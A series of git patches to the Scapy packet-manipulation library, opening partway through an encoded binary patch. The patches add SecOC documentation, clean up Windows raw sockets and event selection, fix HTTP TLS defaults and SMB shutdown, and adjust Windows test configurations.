zH@n$oD-Cz-#em@W5>>4JSzrZ|mtQk4grjrzui$sSqnToKg>EFP&j!y(ln0qN>GbIs zbtkQ6D|8il&6h~LG%hahOVnV8Gl+q=*qXtg@u(}-W6x5{t7=rCZ~xM#LW$1EdI&cyi0iD-YoWwSSKlY04NS60 znP0(`)Eq0|xAsHqR$)nZrPl~g4Ll?|-oFz9oLO*U|5}h8G{nc%OtpU zU>-9_NL!Z|w7!;`2Yp{i#$$`qO}9#5gyf1~{V|RwxEdLaVj42v?E@^E$QJyo-}R2x z&$fj;%$fU4e_UW@{#&H9{t%roNE_s-L=>zs{{Ir|g7lkCs@XS3n8ly~$fzRjj*h8g z6c@$7+nHqZ(WCcjPcrP=H~;jleWNzhLNkm4)arTyYRX4ZWNn&gYNPg585TWEB>6-3 z)AMwC7R{HEGj6``;S*?lw+{1$ps_LrZIU!^Rlw8o@|MJ{OdK=y@FMW*hrE{AG{RiY zkG(zSp!UO~ktnV&XsyDYBPok`yV3A&L@~9cIj>UkKx4-2tG!s`JDPN4M+&FAZJ``K zK=%hHayHt3FfIn)Yrnhls zml~*a>4zsln-3l8BL*Slm&;Kb(-XBoun}}HBtL&LU$4fChyEI5%|i5%9SG@U;=!rh z$H!yD0%$ZBZS6ShS!D`)e2WtkiM?YNHOuubg|Ks!Out)}YtuCjuZURYWxGd5%d<<( zN8(|2ww;&nx%u0ve-O6b5 z!i(Qed*MqUHkVN^DILrDu)<|9PR5ZZ7q`i2)~tt&iD7fv00>s}BE zxB*cx25SuyPaWa1wq?V4zMpBh;CV-_=62T}UB~^&VtW@dXYO+6`e;&IIt|gcuBmn5 ziBSnVF{?<0r*m()KW=@v{ngAO1sI!B%V1mtz)0set>%)dMKN*Q(@?+5xuBA?1W9-+ zj%3Oo>#!<-Xy9GfN1eL&lp#DY-Gt2FuU%7>#|OVGOZd_1!Gj09!Hw&(cArS8NY2RE z74-}maY6U%1OTP;<5Kn3j`SPdgW>vM(kvvaLU0!{g7w!=nHoyI;dj4H>hKp8d$lAbRbYqZm}y|%(A zG5JE(d14O;SdE28tUF1zd;ZmAOi0Qb)5s1+tBOZ}PGq*e1aL9BOQ{wp)RY|RDnve3!e zh$7+TRYnCq(e=X|Bd0!auz=18fn#`g1_a1Z+1+2hMHXOp2k2I@Bqb^(iG`fDiM+Nr4QM6s)IC5N$H)L9cuY<`RA*^$@-eY0;`pC zCX~HqA)XNzv}wts9sd5a$GMSNrYpOHR9)7^SxXjbr3byDgJ^y6P3GU=4DD z6^B6RMg$T2zJ!)&6YkGd@ZOARHB<&`(n8D$_r2G@_|c;rTujz_irZIHj(`w%&d9E) zxr2N~`U*z@6uiHKPUAB(!`*0UVGrJ!JK*Q0T6W^|0$!V?ly&RcmAQ!fu79Tj{jYZ$ z!2RBR=`zsb;k|nY;5JtRPgCUU!go%WeIgHo_xa`j_OVPk3+|sk8)?Y${m) bytes: + """ + This method retrieves the payload, including the SecOCDataID, + which is used for MAC computation. + """ + secoc_data_id = self.identifier # CANFD identifier + payload = self.pdu_payload + return bytes(secoc_data_id) + bytes(payload) + + def get_secoc_key(self) -> bytes: + """ + This method provides the secret key for the specified SecOCDataID. + """ + secoc_data_id = self.identifier + secoc_key = GLOBAL_KEYS[secoc_data_id] + return secoc_key + + def get_secoc_freshness_value(self) -> bytes: + """ + This method provides the full freshness value required for MAC computation. + """ + freshness_value = trip_count + reset_counter + message_count + self.tfv + return bytes(freshness_value) + +Preparation +----------- + +To properly dissect SecOC and non-SecOC AUTOSAR PDUs or CANFD frames, SecOC PDUs need to be registered. This registration informs the dissector whether to use SecOC variants or non-SecOC variants of the packet for dissection. + +.. code-block:: python + + My_SecOC_CANFD.register_secoc_protected_pdu(pdu_id=0x123) + + socket = CANSocket("vcan0", fd=True, basecls=My_SecOC_CANFD) + +The above code registers the PDU with identifier `0x123` as a SecOC_CANFD packet. All other packets will be interpreted as regular CANFD packets. + +Working with SecOC +------------------ + +Once you have obtained a SecOC packet from a socket or a PCAP file, you can use the SecOC-related functions to handle authentication and verification. + +.. code-block:: python + + # Suppose this is our SecOC packet + pkt: My_SecOC_CANFD + + # A call to secoc_authenticate will update the truncated freshness value and the truncated MAC of the packet + pkt.secoc_authenticate() + + # The truncated freshness value and MAC are now updated + print(pkt.tfv) # Updated truncated freshness value + print(pkt.tmac) # Updated truncated MAC + + # A call to secoc_verify will compute the MAC from the payload of the packet and the local freshness value, + # then compare it with the truncated MAC of the packet. + if pkt.secoc_verify(): + print("Message verified") + + Test-Setup Tutorials ==================== From ee755d0d1753d667572e685f65b0faa9ad2325ec Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 22 Jul 2024 11:31:36 +0200 Subject: [PATCH 1325/1632] Use SourceMACField in ICMPv6NDOptSrcLLAddr (#4468) --- scapy/layers/inet6.py | 11 +++++++++-- scapy/layers/l2.py | 2 -- 2 files changed, 9 insertions(+), 4 deletions(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 8c85719da9f..694f9345817 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -73,7 +73,14 @@ UDP, UDPerror, ) -from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP +from scapy.layers.l2 import ( + CookedLinux, + Ether, + GRE, + Loopback, + SNAP, + SourceMACField, +) from scapy.packet import bind_layers, Packet, Raw from scapy.sendrecv import sendp, sniff, sr, srp1 from scapy.supersocket import SuperSocket @@ -1831,7 +1838,7 @@ class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address" fields_desc = [ByteField("type", 1), ByteField("len", 1), - MACField("lladdr", ETHER_ANY)] + SourceMACField("lladdr")] def mysummary(self): return self.sprintf("%name% %lladdr%") diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index ca3f0d87ffc..12c302dfd18 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -228,8 +228,6 @@ def i2h(self, pkt, x): # type: (Optional[Packet], Optional[str]) -> str if x is None: iff = self.getif(pkt) - if iff is None: - iff = conf.iface if iff: x = resolve_iface(iff).mac if x is None: From 420173c742792e1c34061784052d6a9a65932e59 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 26 Jul 2024 00:55:14 +0200 Subject: [PATCH 1326/1632] Fix various critical bugs on Windows (#4467) * Cleanup windows native mode and fix Windows tests. Note: this module should be considered a last chance only, as it comes with MANY limitations. * Remove allow_failures on appveyor * Improve select_objects thanks to WSAEventSelect * Restore support for legacy Npcap adapter (<0.9983) * AppVeyor: upgrade tested Python version * Fix tox breaking AGAIN * Disable native TLS1.3 for the ancient Windows used by AppVeyor * Improvements to SSLStreamSocket on Windows * Disable unstable windows tests * Disable broken DoIP tests on Windows * Minor HTTP bugfix --- .appveyor.yml | 21 ++-- .config/ci/test.sh | 3 +- scapy/arch/windows/__init__.py | 27 ++-- scapy/arch/windows/native.py | 142 ++++++++-------------- scapy/arch/windows/structures.py | 48 +------- scapy/as_resolvers.py | 5 +- scapy/automaton.py | 46 ++++--- scapy/layers/http.py | 21 ++-- scapy/layers/smb2.py | 3 +- scapy/layers/smbserver.py | 5 +- scapy/layers/tls/session.py | 4 +- scapy/supersocket.py | 17 ++- test/configs/windows.utsc | 3 + test/configs/windows2.utsc | 1 + test/contrib/automotive/doip.uts | 6 +- test/regression.uts | 4 +- test/scapy/layers/tls/tlsclientserver.uts | 9 +- test/windows.uts | 39 +++--- 18 files changed, 186 insertions(+), 218 deletions(-) diff --git a/.appveyor.yml b/.appveyor.yml index 65292730e40..b27bc3ce9c6 100644 --- a/.appveyor.yml +++ b/.appveyor.yml @@ -7,26 +7,23 @@ environment: # Python versions that will be tested # Note: it defines variables that can be used later matrix: - - PYTHON: "C:\\Python37-x64" - PYTHON_VERSION: "3.7.x" + - PYTHON: "C:\\Python312-x64" + PYTHON_VERSION: "3.12.x" PYTHON_ARCH: "64" - TOXENV: "py37-windows" + TOXENV: "py312-windows" UT_FLAGS: "-K scanner" - - PYTHON: "C:\\Python37-x64" - PYTHON_VERSION: "3.7.x" + - PYTHON: "C:\\Python312-x64" + PYTHON_VERSION: "3.12.x" PYTHON_ARCH: "64" - TOXENV: "py37-windows" + TOXENV: "py312-windows" UT_FLAGS: "-k scanner" -# allow scanner builds to fail -matrix: - allow_failures: - - UT_FLAGS: "-k scanner" - # There is no build phase for Scapy build: off install: + # Log some debug info + - ver # Install the npcap, windump and wireshark suites - ps: .\.config\appveyor\InstallNpcap.ps1 - ps: .\.config\appveyor\InstallWindumpNpcap.ps1 @@ -43,7 +40,7 @@ test_script: # Set environment variables - set PYTHONPATH=%APPVEYOR_BUILD_FOLDER% - set PATH=%APPVEYOR_BUILD_FOLDER%;C:\Program Files\Wireshark\;C:\Program Files\Windump\;%PATH% - - set TOX_PARALLEL_NO_SPINNER=1 + # - set TOX_PARALLEL_NO_SPINNER=1 # Main unit tests - "%PYTHON%\\python -m tox -- %UT_FLAGS%" diff --git a/.config/ci/test.sh b/.config/ci/test.sh index f6d58f5d150..94a5c576df1 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -117,7 +117,8 @@ then fi # Launch Scapy unit tests -TOX_PARALLEL_NO_SPINNER=1 tox -- ${UT_FLAGS} || exit 1 +# export TOX_PARALLEL_NO_SPINNER=1 +tox -- ${UT_FLAGS} || exit 1 # Stop if NO_BASH_TESTS is set if [ ! -z "$SIMPLE_TESTS" ] diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index f4f74601849..9213aeb8267 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -71,6 +71,7 @@ # Detection happens after libpcap import (NPcap detection) NPCAP_LOOPBACK_NAME = r"\Device\NPF_Loopback" +NPCAP_LOOPBACK_NAME_LEGACY = "Npcap Loopback Adapter" # before npcap 0.9983 if conf.use_npcap: conf.loopback_name = NPCAP_LOOPBACK_NAME else: @@ -342,7 +343,7 @@ def update(self, data): try: # Npcap loopback interface - if conf.use_npcap and self.network_name == NPCAP_LOOPBACK_NAME: + if conf.use_npcap and self.network_name == conf.loopback_name: # https://nmap.org/npcap/guide/npcap-devguide.html data["mac"] = "00:00:00:00:00:00" data["ip"] = "127.0.0.1" @@ -602,14 +603,20 @@ def load(self, NetworkInterface_Win=NetworkInterface_Win): # Try a restart WindowsInterfacesProvider._pcap_check() + legacy_npcap_guid = None windows_interfaces = dict() for i in get_windows_if_list(): - # Detect Loopback interface - if "Loopback" in i['name']: - i['name'] = conf.loopback_name + # Only consider interfaces with a GUID if i['guid']: - if conf.use_npcap and i['name'] == conf.loopback_name: - i['guid'] = NPCAP_LOOPBACK_NAME + if conf.use_npcap: + # Detect the legacy Loopback interface + if i['name'] == NPCAP_LOOPBACK_NAME_LEGACY: + # Legacy Npcap (<0.9983) + legacy_npcap_guid = i['guid'] + elif "Loopback" in i['name']: + # Newer Npcap + i['guid'] = conf.loopback_name + # Map interface windows_interfaces[i['guid']] = i def iterinterfaces() -> Iterator[ @@ -621,12 +628,16 @@ def iterinterfaces() -> Iterator[ for netw, if_data in conf.cache_pcapiflist.items(): name, ips, flags, _ = if_data guid = _pcapname_to_guid(netw) + if guid == legacy_npcap_guid: + # Legacy Npcap detected ! + conf.loopback_name = netw data = windows_interfaces.get(guid, None) yield netw, name, ips, flags, guid, data else: # We don't have a libpcap provider: only use Windows data for guid, data in windows_interfaces.items(): - yield guid, None, [], 0, guid, data + netw = r'\Device\NPF_' + guid if guid[0] != '\\' else guid + yield netw, None, [], 0, guid, data index = 0 for netw, name, ips, flags, guid, data in iterinterfaces(): @@ -1021,7 +1032,7 @@ def __init__(self, *args, **kargs): # type: (*Any, **Any) -> None raise RuntimeError( "Sniffing and sending packets is not available at layer 2: " - "winpcap is not installed. You may use conf.L3socket or" + "winpcap is not installed. You may use conf.L3socket or " "conf.L3socket6 to access layer 3" ) diff --git a/scapy/arch/windows/native.py b/scapy/arch/windows/native.py index 1e87b6556f2..61cfa8beb8a 100644 --- a/scapy/arch/windows/native.py +++ b/scapy/arch/windows/native.py @@ -6,49 +6,23 @@ """ Native Microsoft Windows sockets (L3 only) -## Notice: ICMP packets +This uses Raw Sockets from winsock +https://learn.microsoft.com/en-us/windows/win32/winsock/tcp-ip-raw-sockets-2 -DISCLAIMER: Please use Npcap/Winpcap to send/receive ICMP. It is going to work. -Below is some additional information, mainly implemented in a testing purpose. +.. note:: -When in native mode, everything goes through the Windows kernel. -This firstly requires that the Firewall is open. Be sure it allows ICMPv4/6 -packets in and out. -Windows may drop packets that it finds wrong. for instance, answers to -ICMP packets with id=0 or seq=0 may be dropped. It means that sent packets -should (most of the time) be perfectly built. - -A perfectly built ICMP req packet on Windows means that its id is 1, its -checksum (IP and ICMP) are correctly built, but also that its seq number is -in the "allowed range". - In fact, every time an ICMP packet is sent on Windows, a global sequence -number is increased, which is only reset at boot time. The seq number of the -received ICMP packet must be in the range [current, current + 3] to be valid, -and received by the socket. The current number is quite hard to get, thus we -provide in this module the get_actual_icmp_seq() function. - -Example: - >>> conf.use_pcap = False - >>> a = conf.L3socket() - # This will (most likely) work: - >>> current = get_current_icmp_seq() - >>> a.sr(IP(dst="www.google.com", ttl=128)/ICMP(id=1, seq=current)) - # This won't: - >>> a.sr(IP(dst="www.google.com", ttl=128)/ICMP()) - -PS: on computers where the firewall isn't open, Windows temporarily opens it -when using the `ping` util from cmd.exe. One can first call a ping on cmd, -then do custom calls through the socket using get_current_icmp_seq(). See -the tests (windows.uts) for an example. + Don't use this module. + It is a proof of concept, and a worse-case-scenario failover, but you should + consider that raw sockets on Windows don't work and install Npcap to avoid using + it at all cost. """ + import io -import os import socket -import subprocess +import struct import time from scapy.automaton import select_objects -from scapy.arch.windows.structures import GetIcmpStatistics from scapy.compat import raw from scapy.config import conf from scapy.data import MTU @@ -70,14 +44,31 @@ class L3WinSocket(SuperSocket): + """ + A L3 raw socket implementation native to Windows. + + Official "Windows Limitations" from MSDN: + - TCP data cannot be sent over raw sockets. + - UDP datagrams with an invalid source address cannot be sent over raw sockets. + - For IPv6 (address family of AF_INET6), an application receives everything + after the last IPv6 header in each received datagram [...]. The application + does not receive any IPv6 headers using a raw socket. + + Unofficial limitations: + - Turns out we actually don't see any incoming TCP data, only the outgoing. + We do properly see UDP, ICMP, etc. both ways though. + - To match IPv6 responses, one must use `conf.checkIPaddr = False` as we can't + get the real destination. + + **To overcome those limitations, install Npcap.** + """ desc = "a native Layer 3 (IPv4) raw socket under Windows" nonblocking_socket = True __selectable_force_select__ = True # see automaton.py - __slots__ = ["promisc", "cls", "ipv6", "proto"] + __slots__ = ["promisc", "cls", "ipv6"] def __init__(self, iface=None, # type: Optional[_GlobInterfaceType] - proto=None, # type: Optional[int] ttl=128, # type: int ipv6=False, # type: bool promisc=True, # type: bool @@ -89,49 +80,28 @@ def __init__(self, for kwarg in kwargs: log_runtime.warning("Dropping unsupported option: %s" % kwarg) self.iface = iface and resolve_iface(iface) or conf.iface + if not self.iface.is_valid(): + log_runtime.warning("Interface is invalid. This will fail.") af = socket.AF_INET6 if ipv6 else socket.AF_INET self.ipv6 = ipv6 - # Proto and cls - if proto is None: - if self.ipv6: - # On IPv6, the header isn't returned with recvfrom(). - # We don't want to guess if it's TCP, UDP or SCTP.. so ask for proto - # (This would be fixable if Python supported recvmsg() on Windows) - log_runtime.warning( - "Due to restrictions, 'proto' must be provided when " - "opening raw IPv6 sockets. Defaulting to socket.IPPROTO_UDP" - ) - self.proto = socket.IPPROTO_UDP - else: - self.proto = socket.IPPROTO_IP - elif self.ipv6 and proto == socket.IPPROTO_TCP: - # Ah, sadly this isn't supported either. - log_runtime.warning( - "Be careful, socket.IPPROTO_TCP doesn't work in raw sockets on " - "Windows, so this is equivalent to socket.IPPROTO_IP." - ) - self.proto = socket.IPPROTO_IP - else: - self.proto = proto self.cls = IPv6 if ipv6 else IP # Promisc if promisc is None: promisc = conf.sniff_promisc self.promisc = promisc # Notes: - # - IPPROTO_RAW only works to send packets. + # - IPPROTO_RAW is broken. We don't use it. # - IPPROTO_IPV6 exists in MSDN docs, but using it will result in # no packets being received. Same for its options (IPV6_HDRINCL...) # However, using IPPROTO_IP with AF_INET6 will still receive # the IPv6 packets try: # Listening on AF_INET6 IPPROTO_IPV6 is broken. Use IPPROTO_IP - self.ins = socket.socket(af, - socket.SOCK_RAW, - socket.IPPROTO_IP) - self.outs = socket.socket(af, - socket.SOCK_RAW, - socket.IPPROTO_RAW) + self.outs = self.ins = socket.socket( + af, + socket.SOCK_RAW, + socket.IPPROTO_IP, + ) except OSError as e: if e.errno == 13: raise OSError("Windows native L3 Raw sockets are only " @@ -139,12 +109,10 @@ def __init__(self, "Please install Npcap to workaround !") raise self.ins.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) - self.outs.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.ins.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 2**30) self.outs.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 2**30) # set TTL self.ins.setsockopt(socket.IPPROTO_IP, socket.IP_TTL, ttl) - self.outs.setsockopt(socket.IPPROTO_IP, socket.IP_TTL, ttl) # Get as much data as possible: reduce what is cropped if ipv6: # IPV6_HDRINCL is broken. Use IP_HDRINCL even on IPv6 @@ -159,7 +127,6 @@ def __init__(self, else: # IOCTL Include IP headers self.ins.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) - self.outs.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) try: # Not Windows XP self.ins.setsockopt(socket.IPPROTO_IP, socket.IP_RECVDSTADDR, 1) @@ -193,6 +160,12 @@ def send(self, x): if self.cls not in x: raise Scapy_Exception("L3WinSocket can only send IP/IPv6 packets !" " Install Npcap/Winpcap to send more") + from scapy.layers.inet import TCP + if TCP in x: + raise Scapy_Exception( + "'TCP data cannot be sent over raw socket': " + "https://learn.microsoft.com/en-us/windows/win32/winsock/tcp-ip-raw-sockets-2" # noqa: E501 + ) if not self.outs: raise Scapy_Exception("Socket not created") dst_ip = str(x[self.cls].dst) @@ -225,14 +198,20 @@ def recv_raw(self, x=MTU): # AF_INET6 does not return the IPv6 header. Let's build it # (host, port, flowinfo, scopeid) host, _, flowinfo, _ = address + # We have to guess what the proto is. Ugly heuristics ahead :( + # Waiting for https://github.com/python/cpython/issues/80398 + if len(data) > 6 and struct.unpack("!H", data[4:6])[0] == len(data): + proto = socket.IPPROTO_UDP + elif data and data[0] in range(128, 138): # ugh + proto = socket.IPPROTO_ICMPV6 + else: + proto = socket.IPPROTO_TCP header = raw( IPv6( src=host, dst="::", fl=flowinfo, - # when IPPROTO_IP (0) is selected, we have no idea what's nh, - # so set an invalid value. - nh=self.proto or 0xFF, + nh=proto or 0xFF, plen=len(data) ) ) @@ -262,22 +241,3 @@ def __init__(self, **kwargs): ipv6=True, **kwargs, ) - - -def open_icmp_firewall(host): - # type: (str) -> int - """Temporarily open the ICMP firewall. Tricks Windows into allowing - ICMP packets for a short period of time (~ 1 minute)""" - # We call ping with a timeout of 1ms: will return instantly - with open(os.devnull, 'wb') as DEVNULL: - return subprocess.Popen("ping -4 -w 1 -n 1 %s" % host, - shell=True, - stdout=DEVNULL, - stderr=DEVNULL).wait() - - -def get_current_icmp_seq(): - # type: () -> int - """See help(scapy.arch.windows.native) for more information. - Returns the current ICMP seq number.""" - return GetIcmpStatistics()['stats']['icmpOutStats']['dwEchos'] diff --git a/scapy/arch/windows/structures.py b/scapy/arch/windows/structures.py index a74cce21118..e84b407cf23 100644 --- a/scapy/arch/windows/structures.py +++ b/scapy/arch/windows/structures.py @@ -205,52 +205,6 @@ class SOCKADDR_INET(ctypes.Union): ("Ipv6", sockaddr_in6), ("si_family", USHORT)] -############################## -######### ICMP stats ######### -############################## - - -class MIBICMPSTATS(Structure): - _fields_ = [("dwMsgs", DWORD), - ("dwErrors", DWORD), - ("dwDestUnreachs", DWORD), - ("dwTimeExcds", DWORD), - ("dwParmProbs", DWORD), - ("dwSrcQuenchs", DWORD), - ("dwRedirects", DWORD), - ("dwEchos", DWORD), - ("dwEchoReps", DWORD), - ("dwTimestamps", DWORD), - ("dwTimestampReps", DWORD), - ("dwAddrMasks", DWORD), - ("dwAddrMaskReps", DWORD)] - - -class MIBICMPINFO(Structure): - _fields_ = [("icmpInStats", MIBICMPSTATS), - ("icmpOutStats", MIBICMPSTATS)] - - -class MIB_ICMP(Structure): - _fields_ = [("stats", MIBICMPINFO)] - - -PMIB_ICMP = POINTER(MIB_ICMP) - -# Func - -_GetIcmpStatistics = WINFUNCTYPE(ULONG, PMIB_ICMP)( - ('GetIcmpStatistics', iphlpapi)) - - -def GetIcmpStatistics(): - # type: () -> Dict[str, Dict[str, Dict[str, int]]] - """Return all Windows ICMP stats from iphlpapi""" - statistics = MIB_ICMP() - _GetIcmpStatistics(byref(statistics)) - results = _struct_to_dict(statistics) - del statistics - return results ############################## ##### Adapters Addresses ##### @@ -668,4 +622,4 @@ def read(self, x: int = MTU) -> bytes: def close(self) -> None: # ignore failures ctypes.windll.kernel32.CloseHandle(fd) - return _opened() # type: ignore \ No newline at end of file + return _opened() # type: ignore diff --git a/scapy/as_resolvers.py b/scapy/as_resolvers.py index a09791f721d..a9f9bb537f9 100644 --- a/scapy/as_resolvers.py +++ b/scapy/as_resolvers.py @@ -63,7 +63,10 @@ def _resolve_one(self, ip): self.s.send(("%s\n" % ip).encode("utf8")) x = b"" while not (b"%" in x or b"source" in x): - x += self.s.recv(8192) + d = self.s.recv(8192) + if not d: + break + x += d asn, desc = self._parse_whois(x) return ip, asn, desc diff --git a/scapy/automaton.py b/scapy/automaton.py index 3f8862fe09a..353a132e14d 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -57,6 +57,10 @@ from scapy.compat import DecoratorCallable +# winsock.h +FD_READ = 0x00000001 + + def select_objects(inputs, remain): # type: (Iterable[Any], Union[float, int, None]) -> List[Any] """ @@ -83,12 +87,26 @@ def select_objects(inputs, remain): """ if not WINDOWS: return select.select(inputs, [], [], remain)[0] - natives = [] + inputs = list(inputs) events = [] + created = [] results = set() - for i in list(inputs): + for i in inputs: if getattr(i, "__selectable_force_select__", False): - natives.append(i) + # Native socket.socket object. We would normally use select.select. + evt = ctypes.windll.ws2_32.WSACreateEvent() + created.append(evt) + res = ctypes.windll.ws2_32.WSAEventSelect( + ctypes.c_void_p(i.fileno()), + evt, + FD_READ + ) + if res == 0: + # Was a socket + events.append(evt) + else: + # Fallback to normal event + events.append(i.fileno()) elif i.fileno() < 0: # Special case: On Windows, we consider that an object that returns # a negative fileno (impossible), is always readable. This is used @@ -96,18 +114,13 @@ def select_objects(inputs, remain): # no valid fileno (and will stop on EOFError). results.add(i) else: - events.append(i) - if natives: - results = results.union(set(select.select(natives, [], [], remain)[0])) - if results: - # We have native results, poll. - remain = 0 + events.append(i.fileno()) if events: # 0xFFFFFFFF = INFINITE remainms = int(remain * 1000 if remain is not None else 0xFFFFFFFF) if len(events) == 1: res = ctypes.windll.kernel32.WaitForSingleObject( - ctypes.c_void_p(events[0].fileno()), + ctypes.c_void_p(events[0]), remainms ) else: @@ -117,22 +130,25 @@ def select_objects(inputs, remain): res = ctypes.windll.kernel32.WaitForMultipleObjects( len(events), (ctypes.c_void_p * len(events))( - *[x.fileno() for x in events] + *events ), False, remainms ) if res != 0xFFFFFFFF and res != 0x00000102: # Failed or Timeout - results.add(events[res]) + results.add(inputs[res]) if len(events) > 1: # Now poll the others, if any - for evt in events: + for i, evt in enumerate(events): res = ctypes.windll.kernel32.WaitForSingleObject( - ctypes.c_void_p(evt.fileno()), + ctypes.c_void_p(evt), 0 # poll: don't wait ) if res == 0: - results.add(evt) + results.add(inputs[i]) + # Cleanup created events, if any + for evt in created: + ctypes.windll.ws2_32.WSACloseEvent(evt) return list(results) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 617e516a1f7..4e12743594f 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -769,10 +769,7 @@ def __init__( def _connect_or_reuse(self, host, port=None, tls=False, timeout=5): # Get the port if port is None: - if tls: - port = 443 - else: - port = 80 + port = 443 if tls else 80 # If the current socket matches, keep it. if self._sockinfo == (host, port): return @@ -800,13 +797,15 @@ def _connect_or_reuse(self, host, port=None, tls=False, timeout=5): ) if tls: if self.sslcontext is None: - context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) if self.no_check_certificate: + context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) context.check_hostname = False context.verify_mode = ssl.CERT_NONE + else: + context = ssl.create_default_context() else: context = self.sslcontext - sock = context.wrap_socket(sock) + sock = context.wrap_socket(sock, server_hostname=host) self.sock = SSLStreamSocket(sock, HTTP) else: self.sock = StreamSocket(sock, HTTP) @@ -918,14 +917,14 @@ def close(self): self.sock.close() -def http_request(host, path="/", port=80, timeout=3, - display=False, verbose=0, **headers): +def http_request(host, path="/", port=None, timeout=3, + display=False, tls=False, verbose=0, **headers): """ Util to perform an HTTP request. :param host: the host to connect to :param path: the path of the request (default /) - :param port: the port (default 80) + :param port: the port (default 80/443) :param timeout: timeout before None is returned :param display: display the result in the default browser (default False) :param iface: interface to use. Changing this turns on "raw" @@ -934,8 +933,10 @@ def http_request(host, path="/", port=80, timeout=3, :returns: the HTTPResponse packet """ client = HTTP_Client(HTTP_AUTH_MECHS.NONE, verb=verbose) + if port is None: + port = 443 if tls else 80 ans = client.request( - "http://%s:%s%s" % (host, port, path), + "http%s://%s:%s%s" % (tls and "s" or "", host, port, path), timeout=timeout, ) diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index e45e2d2fa1a..941cf09f835 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -17,6 +17,7 @@ import hashlib import struct +from scapy.automaton import select_objects from scapy.config import conf, crypto_validator from scapy.error import log_runtime from scapy.packet import Packet, bind_layers, bind_top_down @@ -4237,7 +4238,7 @@ def send(self, x, Compounded=False, **kwargs): def select(sockets, remain=conf.recv_poll_rate): if any(getattr(x, "queue", None) for x in sockets): return [x for x in sockets if isinstance(x, SMBStreamSocket) and x.queue] - return StreamSocket.select(sockets, remain=remain) + return select_objects(sockets, remain=remain) class SMBSession(DefaultSession): diff --git a/scapy/layers/smbserver.py b/scapy/layers/smbserver.py index 46f89da2b74..17338fac3bd 100644 --- a/scapy/layers/smbserver.py +++ b/scapy/layers/smbserver.py @@ -1710,7 +1710,10 @@ def close(self): Close the smbserver if started in background mode (bg=True) """ if self.srv: - self.srv.shutdown(socket.SHUT_RDWR) + try: + self.srv.shutdown(socket.SHUT_RDWR) + except OSError: + pass self.srv.close() diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index 9855b0cd411..f7b219a6835 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -55,13 +55,13 @@ def load_nss_keys(filename): try: client_random = binascii.unhexlify(data[1]) - except binascii.Error: + except ValueError: warning("Invalid ClientRandom: %s", data[1]) return {} try: secret = binascii.unhexlify(data[2]) - except binascii.Error: + except ValueError: warning("Invalid Secret: %s", data[2]) return {} diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 1f967044cb6..592c581d41f 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -515,7 +515,10 @@ def recv(self, x=None, **kwargs): if x is None: x = MTU # Block - data = self.ins.recv(x) + try: + data = self.ins.recv(x) + except OSError: + raise EOFError try: pkt = self.sess.process(data, cls=self.basecls) # type: ignore except struct.error: @@ -527,6 +530,18 @@ def recv(self, x=None, **kwargs): return self.recv(x) return pkt + @staticmethod + def select(sockets, remain=None): + # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] + queued = [ + x + for x in sockets + if isinstance(x, SSLStreamSocket) and x.sess.data + ] + if queued: + return queued # type: ignore + return super(SSLStreamSocket, SSLStreamSocket).select(sockets, remain=remain) + class L2ListenTcpdump(SuperSocket): desc = "read packets at layer 2 using tcpdump" diff --git a/test/configs/windows.utsc b/test/configs/windows.utsc index 09691d2af34..468979a5ca5 100644 --- a/test/configs/windows.utsc +++ b/test/configs/windows.utsc @@ -23,9 +23,12 @@ "test\\scapy\\layers\\tls\\*.uts": "load_layer(\"tls\")" }, "kw_ko": [ + "as_resolvers", "brotli", + "broken_windows", "ipv6", "linux", + "native_tls13", "mock_read_routes_bsd", "open_ssl_client", "osx", diff --git a/test/configs/windows2.utsc b/test/configs/windows2.utsc index c231de57f85..1c5dbe0c9df 100644 --- a/test/configs/windows2.utsc +++ b/test/configs/windows2.utsc @@ -24,6 +24,7 @@ "kw_ko": [ "osx", "linux", + "broken_windows", "crypto_advanced", "mock_read_routes_bsd", "appveyor_only", diff --git a/test/contrib/automotive/doip.uts b/test/contrib/automotive/doip.uts index f3135928c62..161b9b3df19 100644 --- a/test/contrib/automotive/doip.uts +++ b/test/contrib/automotive/doip.uts @@ -524,6 +524,7 @@ server_thread.join(timeout=1) assert len(pkts) == 2 = Test DoIPSslSocket +~ broken_windows certstring = """ LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUV2QUlCQURBTkJna3Foa2lHOXcwQkFRRUZB @@ -626,6 +627,7 @@ server_thread.join(timeout=1) assert len(pkts) == 2 = Test DoIPSslSocket6 +~ broken_windows server_up = threading.Event() def server(): @@ -662,6 +664,7 @@ server_thread.join(timeout=1) assert len(pkts) == 2 = Test UDS_DoIPSslSocket6 +~ broken_windows server_up = threading.Event() def server(): 